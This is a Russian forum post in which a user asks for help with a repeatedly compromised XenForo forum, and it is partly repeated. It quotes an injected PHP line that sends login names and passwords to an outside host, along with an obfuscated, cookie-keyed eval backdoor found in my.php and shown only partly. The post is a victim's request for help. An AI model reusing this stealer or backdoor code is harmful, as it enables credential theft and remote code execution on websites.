jolygolfeed
Проверенные
- Сообщения
- 307
- Реакции
- 230
- Баллы
- 3,345
В общем история такая. У моего друга форум, ему уже 2,5 года.
Проблема такая:
02.05.16 файл user.php сам стал изменятся и там добавляется строка
$thisstring = str_replace(" ","",'file_get_contents(\'htt p: //you tube-down loa der. ru/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');
или такой
$thisstring = str_replace(" ","",'file_get_contents(\'htt p: //46.254.21.14/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');
Самое смешное когда запретил хост менять файл этот. Он через другой файл пытался выполнить этот же запрос.
Как стало всем понятно этот код при авторизации ворует пароли и отправляет этому "топ" хакеру.
В общем я помог этому человеку и посоветовал мастера. Ему снесли все, взяли только контент(темы и сообщения) и users.
Остальное все чистое поставили(ксенфоро, и дизайн тоже поставили новый)
В итоге через пару часов появился файл my.php
и в нем код
Все копировать не стал, там шифр пошел.
В итоге этот файл удалил тех админ, и после удаления, через 3-4 часа все файлы с publick_html были удалены.
Мы все снова перезалили, снова переустановили.
Файл user.php через час был изменен, и там снова код.
Мы все убрали, все файлы в папке model заблокировали от изменений, и потом появился на сервер файл my2.php (там тот же код) его уже боятся удалять.
В логах у хоста - Никто не входил на сервер в это время, через фтп тоже никто не заходил и в панель также.
Что же делать, дорогие форумчане.
Проблема такая:
02.05.16 файл user.php сам стал изменятся и там добавляется строка
$thisstring = str_replace(" ","",'file_get_contents(\'htt p: //you tube-down loa der. ru/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');
или такой
$thisstring = str_replace(" ","",'file_get_contents(\'htt p: //46.254.21.14/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');
Самое смешное когда запретил хост менять файл этот. Он через другой файл пытался выполнить этот же запрос.
Как стало всем понятно этот код при авторизации ворует пароли и отправляет этому "топ" хакеру.
В общем я помог этому человеку и посоветовал мастера. Ему снесли все, взяли только контент(темы и сообщения) и users.
Остальное все чистое поставили(ксенфоро, и дизайн тоже поставили новый)
В итоге через пару часов появился файл my.php
и в нем код
Код:
<?php
function rs2fd($v, $w) {
$dll = count($v);
$n = ($dll - 1) << 2;
if ($w) {
$m = $v[$dll - 1];
if (($m < $n - 3) || ($m > $n)) return false;
$n = $m;}
$s = array();
for ($i = 0; $i < $dll; $i++) {
$s[$i] = pack("V", $v[$i]);
}
if ($w) {
return substr(join('', $s), 0, $n);
} else {
return join('', $s);}}
$cx='base'.(4*8*2).'_de'.'code';
function fd2rs($s, $w) {
$v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
$v = array_values($v);
if ($w) {
$v[count($v)] = strlen($s);
}return $v;}$cxx=''; if(isset($_COOKIE['__'])){$cxx=$_COOKIE['__'];}
function int32($n) {
while ($n >= 2147483648) $n -= 4294967296;
while ($n <= -2147483649) $n += 4294967296;
return (int)$n;
}
function lol($str, $zm) {
if ($str == "") {
return "";
}
$aib='base'.(4*8*2).'_de'.'code';
$aibolit=$aib('MHgwN2ZmZmZmZg==');
$v = fd2rs($str, false);
$k = fd2rs($zm, false);
if (count($k) < 4) {
for ($i = count($k); $i < 4; $i++) {
$k[$i] = 0;}}
$n = count($v) - 1;
$z = $v[$n];
$y = $v[0];
$delta = 0x9E3779B9;
$q = floor(6 + 52 / ($n + 1));
$sum = int32($q * $delta);
while ($sum != 0) {
$e = $sum >> 2 & 3;
for ($p = $n; $p > 0; $p--) {
$z = $v[$p - 1];
$mx = int32(((($z >> 5 & 0x07ffffff)) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
$y = $v[$p] = int32($v[$p] - $mx);
}
$z = $v[$n];
$mx = int32(((($z >> 5 & 0x07ffffff)) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
$y = $v[0] = int32($v[0] - $mx);
$sum = int32($sum - $delta);
}
return rs2fd($v, true);
}
$klkl='';
$popo='ev'.'al';if($cxx!=''){
eval(trim(gzinflate(lol($cx("sAE1WI8o2vGc+oNQYxY37zUtr49IaS3OObn9c5eSzMT3pxkVQTDlSA=="),$cxx))));
В итоге этот файл удалил тех админ, и после удаления, через 3-4 часа все файлы с publick_html были удалены.
Мы все снова перезалили, снова переустановили.
Файл user.php через час был изменен, и там снова код.
Мы все убрали, все файлы в папке model заблокировали от изменений, и потом появился на сервер файл my2.php (там тот же код) его уже боятся удалять.
В логах у хоста - Никто не входил на сервер в это время, через фтп тоже никто не заходил и в панель также.
Что же делать, дорогие форумчане.